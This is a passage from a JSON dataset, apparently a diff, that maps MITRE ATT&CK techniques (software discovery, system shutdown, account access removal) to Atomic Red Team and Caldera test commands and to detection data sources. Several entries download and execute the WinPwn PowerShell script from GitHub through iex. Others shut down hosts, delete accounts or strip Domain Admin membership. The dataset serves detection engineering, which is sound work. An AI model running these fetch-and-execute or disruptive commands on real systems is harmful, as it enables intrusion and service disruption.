\"__Namespace\" | Select Name | Out-String -Stream | Select-String \"SecurityCenter\";\n$SecurityCenter = $NameSpace | Select-Object -First 1;\nGet-WmiObject -Namespace \"root\\$SecurityCenter\" -Class AntiVirusProduct | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List;\n" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall metadata", + "description": "Data and information that describe a firewall system and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "firewall" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall enumeration", + "description": "A firewall system or element (rule) was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "firewall" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, 
that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall enumeration", + "description": "A firewall system or element (rule) was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "firewall rule" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + 
"collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + 
"https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1518", + "command_list": [ + "reg query \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\" /v svcVersion\n", + "Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize\nGet-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize\n", + "/usr/libexec/PlistBuddy -c \"print :CFBundleShortVersionString\" /Applications/Safari.app/Contents/Info.plist\n/usr/libexec/PlistBuddy -c \"print :CFBundleVersion\" /Applications/Safari.app/Contents/Info.plist\n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nDotnetsearch -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndotnet -consoleoutput -noninteractive", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\npowerSQL -noninteractive -consoleoutput", + "which google-chrome\n", + "which go\n", + "python3 --version;python2 --version;python --version\n", + "python3 
--version&python2 --version&python --version\n", + "(Get-ItemProperty 'HKLM:\\SOFTWARE\\Microsoft\\Internet Explorer').Version\n" + ], + "commands": [ + { + "command": "reg query \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\" /v svcVersion\n", + "source": "atomics/T1518/T1518.yaml", + "name": "Atomic Red Team Test - Software Discovery" + }, + { + "command": "Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize\nGet-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize\n", + "source": "atomics/T1518/T1518.yaml", + "name": "Atomic Red Team Test - Software Discovery" + }, + { + "command": "/usr/libexec/PlistBuddy -c \"print :CFBundleShortVersionString\" /Applications/Safari.app/Contents/Info.plist\n/usr/libexec/PlistBuddy -c \"print :CFBundleVersion\" /Applications/Safari.app/Contents/Info.plist\n", + "source": "atomics/T1518/T1518.yaml", + "name": "Atomic Red Team Test - Software Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nDotnetsearch -noninteractive -consoleoutput", + "source": "atomics/T1518/T1518.yaml", + "name": "Atomic Red Team Test - Software Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndotnet -consoleoutput -noninteractive", + "source": "atomics/T1518/T1518.yaml", + "name": "Atomic Red Team Test - Software Discovery" + }, + { + "command": 
"$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\npowerSQL -noninteractive -consoleoutput", + "source": "atomics/T1518/T1518.yaml", + "name": "Atomic Red Team Test - Software Discovery" + }, + { + "command": "which google-chrome\n", + "source": "data/abilities/discovery/830bb6ed-9594-4817-b1a1-c298c0f9f425.yml", + "name": "Check to see if Gooogle Chrome browser is installed" + }, + { + "command": "which go\n", + "source": "data/abilities/discovery/9849d956-37ea-49f2-a8b5-f2ca080b315d.yml", + "name": "Check to see if GoLang is installed" + }, + { + "command": "python3 --version;python2 --version;python --version\n", + "source": "data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml", + "name": "Check to see what version of python is installed" + }, + { + "command": "python3 --version&python2 --version&python --version\n", + "source": "data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml", + "name": "Check to see what version of python is installed" + }, + { + "command": "(Get-ItemProperty 'HKLM:\\SOFTWARE\\Microsoft\\Internet Explorer').Version\n", + "source": "data/abilities/discovery/c9be8043-a445-4cbf-b77b-ed7bb007fc7c.yml", + "name": "Determine the version of Internet Explorer running" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1518", + "display_name": "Software Discovery", + "atomic_tests": [ + { + "name": "Find and Display Internet Explorer Browser Version", + "auto_generated_guid": "68981660-6670-47ee-a5fa-7e74806420a4", + "description": "Query the registry to determine the version of internet explorer installed on the system.\nUpon execution, version information about internet explorer will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg query 
\"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\" /v svcVersion\n", + "name": "command_prompt" + } + }, + { + "name": "Applications Installed", + "auto_generated_guid": "c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b", + "description": "Query the registry to determine software and versions installed on the system. Upon execution a table of\nsoftware name and version information will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize\nGet-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize\n", + "name": "powershell" + } + }, + { + "name": "Find and Display Safari Browser Version", + "auto_generated_guid": "103d6533-fd2a-4d08-976a-4a598565280f", + "description": "Adversaries may attempt to get a listing of non-security related software that is installed on the system. 
Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "/usr/libexec/PlistBuddy -c \"print :CFBundleShortVersionString\" /Applications/Safari.app/Contents/Info.plist\n/usr/libexec/PlistBuddy -c \"print :CFBundleVersion\" /Applications/Safari.app/Contents/Info.plist\n" + } + }, + { + "name": "WinPwn - Dotnetsearch", + "auto_generated_guid": "7e79a1b6-519e-433c-ad55-3ff293667101", + "description": "Search for any .NET binary file in a share using the Dotnetsearch function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nDotnetsearch -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - DotNet", + "auto_generated_guid": "10ba02d0-ab76-4f80-940d-451633f24c5b", + "description": "Search for .NET Service-Binaries on this system via winpwn dotnet function of WinPwn.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndotnet -consoleoutput -noninteractive", + "name": "powershell" + } + }, + { + "name": "WinPwn - powerSQL", + "auto_generated_guid": "0bb64470-582a-4155-bde2-d6003a95ed34", + "description": "Start PowerUpSQL Checks using powerSQL function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object 
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\npowerSQL -noninteractive -consoleoutput", + "name": "powershell" + } + } + ] + }, + { + "id": "830bb6ed-9594-4817-b1a1-c298c0f9f425", + "name": "Check Chrome", + "description": "Check to see if Gooogle Chrome browser is installed", + "tactic": "discovery", + "technique": { + "attack_id": "T1518", + "name": "Software Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "which google-chrome\n" + } + }, + "linux": { + "sh": { + "command": "which google-chrome\n" + } + } + } + }, + { + "id": "9849d956-37ea-49f2-a8b5-f2ca080b315d", + "name": "Check Go", + "description": "Check to see if GoLang is installed", + "tactic": "discovery", + "technique": { + "attack_id": "T1518", + "name": "Software Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "which go\n" + } + }, + "linux": { + "sh": { + "command": "which go\n" + } + } + } + }, + { + "id": "b18e8767-b7ea-41a3-8e80-baf65a5ddef5", + "name": "Check Python", + "description": "Check to see what version of python is installed", + "tactic": "discovery", + "technique": { + "attack_id": "T1518", + "name": "Software Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "python3 --version;python2 --version;python --version\n" + } + }, + "linux": { + "sh": { + "command": "python3 --version;python2 --version;python --version\n" + } + }, + "windows": { + "cmd": { + "command": "python3 --version&python2 --version&python --version\n" + } + } + } + }, + { + "id": "c9be8043-a445-4cbf-b77b-ed7bb007fc7c", + "name": "Internet Explorer Version", + "description": "Determine the version of Internet Explorer running", + "tactic": "discovery", + "technique": { + "attack_id": "T1518", + "name": "Software Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "(Get-ItemProperty 'HKLM:\\SOFTWARE\\Microsoft\\Internet Explorer').Version\n" + 
} + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall metadata", + "description": "Data and information that describe a firewall system and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "firewall" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall enumeration", + "description": "A firewall system or element (rule) was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "firewall" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall enumeration", + 
"description": "A firewall system or element (rule) was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "firewall rule" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + 
"relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1529", + "command_list": [ + null, + "shutdown 
-r now\n", + "shutdown -h now\n", + "reboot\n", + "halt -p\n", + "halt --reboot\n", + "poweroff\n", + "poweroff --reboot\n" + ], + "commands": [ + { + "command": null, + "source": "atomics/T1529/T1529.yaml", + "name": "Atomic Red Team Test - System Shutdown/Reboot" + }, + { + "command": "shutdown -r now\n", + "source": "atomics/T1529/T1529.yaml", + "name": "Atomic Red Team Test - System Shutdown/Reboot" + }, + { + "command": "shutdown -h now\n", + "source": "atomics/T1529/T1529.yaml", + "name": "Atomic Red Team Test - System Shutdown/Reboot" + }, + { + "command": "reboot\n", + "source": "atomics/T1529/T1529.yaml", + "name": "Atomic Red Team Test - System Shutdown/Reboot" + }, + { + "command": "halt -p\n", + "source": "atomics/T1529/T1529.yaml", + "name": "Atomic Red Team Test - System Shutdown/Reboot" + }, + { + "command": "halt --reboot\n", + "source": "atomics/T1529/T1529.yaml", + "name": "Atomic Red Team Test - System Shutdown/Reboot" + }, + { + "command": "poweroff\n", + "source": "atomics/T1529/T1529.yaml", + "name": "Atomic Red Team Test - System Shutdown/Reboot" + }, + { + "command": "poweroff --reboot\n", + "source": "atomics/T1529/T1529.yaml", + "name": "Atomic Red Team Test - System Shutdown/Reboot" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1529", + "display_name": "System Shutdown/Reboot", + "atomic_tests": [ + { + "name": "Shutdown System - Windows", + "auto_generated_guid": "ad254fa8-45c0-403b-8c77-e00b3d3e7a64", + "description": "This test shuts down a Windows system.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "timeout": { + "description": "Timeout period before shutdown (seconds)", + "type": "Integer", + "default": 1 + } + }, + "executor": { + "command": "shutdown /s /t #{timeout}\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Restart System - Windows", + "auto_generated_guid": "f4648f0d-bf78-483c-bafc-3ec99cd1c302", + "description": "This test restarts a Windows 
system.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "timeout": { + "description": "Timeout period before restart (seconds)", + "type": "Integer", + "default": 1 + } + }, + "executor": { + "command": "shutdown /r /t #{timeout}\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Restart System via `shutdown` - macOS/Linux", + "auto_generated_guid": "6326dbc4-444b-4c04-88f4-27e94d0327cb", + "description": "This test restarts a macOS/Linux system.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "timeout": { + "description": "Time to restart (can be minutes or specific time)", + "type": "String", + "default": "now" + } + }, + "executor": { + "command": "shutdown -r #{timeout}\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Shutdown System via `shutdown` - macOS/Linux", + "auto_generated_guid": "4963a81e-a3ad-4f02-adda-812343b351de", + "description": "This test shuts down a macOS/Linux system using a halt.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "timeout": { + "description": "Time to shutdown (can be minutes or specific time)", + "type": "String", + "default": "now" + } + }, + "executor": { + "command": "shutdown -h #{timeout}\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Restart System via `reboot` - macOS/Linux", + "auto_generated_guid": "47d0b042-a918-40ab-8cf9-150ffe919027", + "description": "This test restarts a macOS/Linux system via `reboot`.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "command": "reboot\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Shutdown System via `halt` - Linux", + "auto_generated_guid": "918f70ab-e1ef-49ff-bc57-b27021df84dd", + "description": "This test shuts down a Linux system using `halt`.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "halt -p\n", + "name": 
"bash", + "elevation_required": true + } + }, + { + "name": "Reboot System via `halt` - Linux", + "auto_generated_guid": "78f92e14-f1e9-4446-b3e9-f1b921f2459e", + "description": "This test restarts a Linux system using `halt`.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "halt --reboot\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Shutdown System via `poweroff` - Linux", + "auto_generated_guid": "73a90cd2-48a2-4ac5-8594-2af35fa909fa", + "description": "This test shuts down a Linux system using `poweroff`.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "poweroff\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Reboot System via `poweroff` - Linux", + "auto_generated_guid": "61303105-ff60-427b-999e-efb90b314e41", + "description": "This test restarts a Linux system using `poweroff`.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "poweroff --reboot\n", + "name": "bash", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { 
+ "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + 
"target_data_element": "host system status" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + null + ] + }, + { + "technique_id": "T1531", + "command_list": [ + "net user AtomicAdministrator #{new_user_password} /add\nnet.exe user AtomicAdministrator #{new_password}\n", + "net user #{user_account} User2ChangePW! /add\nnet.exe user #{user_account} #{new_password}\n", + "net user #{user_account} #{new_user_password} /add\nnet.exe user #{user_account} HuHuHUHoHo283283@dJD\n", + "net user #{user_account} User2DeletePW! /add\nnet.exe user #{user_account} /delete\n", + "net user AtomicUser #{new_user_password} /add\nnet.exe user AtomicUser /delete\n", + "$PWord = ConvertTo-SecureString -String #{super_pass} -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList domain\\super_user, $PWord\nif((Get-ADUser #{remove_user} -Properties memberof).memberof -like \"CN=Domain Admins*\"){\n Remove-ADGroupMember -Identity \"Domain Admins\" -Members #{remove_user} -Credential $Credential -Confirm:$False\n} else{\n write-host \"Error - Make sure #{remove_user} is in the domain admins group\" -foregroundcolor Red\n}\n", + "$PWord = ConvertTo-SecureString -String password -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{super_user}, $PWord\nif((Get-ADUser #{remove_user} -Properties memberof).memberof -like \"CN=Domain Admins*\"){\n Remove-ADGroupMember -Identity \"Domain Admins\" -Members #{remove_user} -Credential $Credential -Confirm:$False\n} else{\n write-host \"Error - Make sure #{remove_user} is in the domain admins group\" -foregroundcolor Red\n}\n", + "$PWord = ConvertTo-SecureString -String #{super_pass} -AsPlainText -Force\n$Credential = New-Object 
-TypeName System.Management.Automation.PSCredential -ArgumentList #{super_user}, $PWord\nif((Get-ADUser remove_user -Properties memberof).memberof -like \"CN=Domain Admins*\"){\n Remove-ADGroupMember -Identity \"Domain Admins\" -Members remove_user -Credential $Credential -Confirm:$False\n} else{\n write-host \"Error - Make sure remove_user is in the domain admins group\" -foregroundcolor Red\n}\n" + ], + "commands": [ + { + "command": "net user AtomicAdministrator #{new_user_password} /add\nnet.exe user AtomicAdministrator #{new_password}\n", + "source": "atomics/T1531/T1531.yaml", + "name": "Atomic Red Team Test - Account Access Removal" + }, + { + "command": "net user #{user_account} User2ChangePW! /add\nnet.exe user #{user_account} #{new_password}\n", + "source": "atomics/T1531/T1531.yaml", + "name": "Atomic Red Team Test - Account Access Removal" + }, + { + "command": "net user #{user_account} #{new_user_password} /add\nnet.exe user #{user_account} HuHuHUHoHo283283@dJD\n", + "source": "atomics/T1531/T1531.yaml", + "name": "Atomic Red Team Test - Account Access Removal" + }, + { + "command": "net user #{user_account} User2DeletePW! 
/add\nnet.exe user #{user_account} /delete\n", + "source": "atomics/T1531/T1531.yaml", + "name": "Atomic Red Team Test - Account Access Removal" + }, + { + "command": "net user AtomicUser #{new_user_password} /add\nnet.exe user AtomicUser /delete\n", + "source": "atomics/T1531/T1531.yaml", + "name": "Atomic Red Team Test - Account Access Removal" + }, + { + "command": "$PWord = ConvertTo-SecureString -String #{super_pass} -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList domain\\super_user, $PWord\nif((Get-ADUser #{remove_user} -Properties memberof).memberof -like \"CN=Domain Admins*\"){\n Remove-ADGroupMember -Identity \"Domain Admins\" -Members #{remove_user} -Credential $Credential -Confirm:$False\n} else{\n write-host \"Error - Make sure #{remove_user} is in the domain admins group\" -foregroundcolor Red\n}\n", + "source": "atomics/T1531/T1531.yaml", + "name": "Atomic Red Team Test - Account Access Removal" + }, + { + "command": "$PWord = ConvertTo-SecureString -String password -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{super_user}, $PWord\nif((Get-ADUser #{remove_user} -Properties memberof).memberof -like \"CN=Domain Admins*\"){\n Remove-ADGroupMember -Identity \"Domain Admins\" -Members #{remove_user} -Credential $Credential -Confirm:$False\n} else{\n write-host \"Error - Make sure #{remove_user} is in the domain admins group\" -foregroundcolor Red\n}\n", + "source": "atomics/T1531/T1531.yaml", + "name": "Atomic Red Team Test - Account Access Removal" + }, + { + "command": "$PWord = ConvertTo-SecureString -String #{super_pass} -AsPlainText -Force\n$Credential = New-Object -TypeName 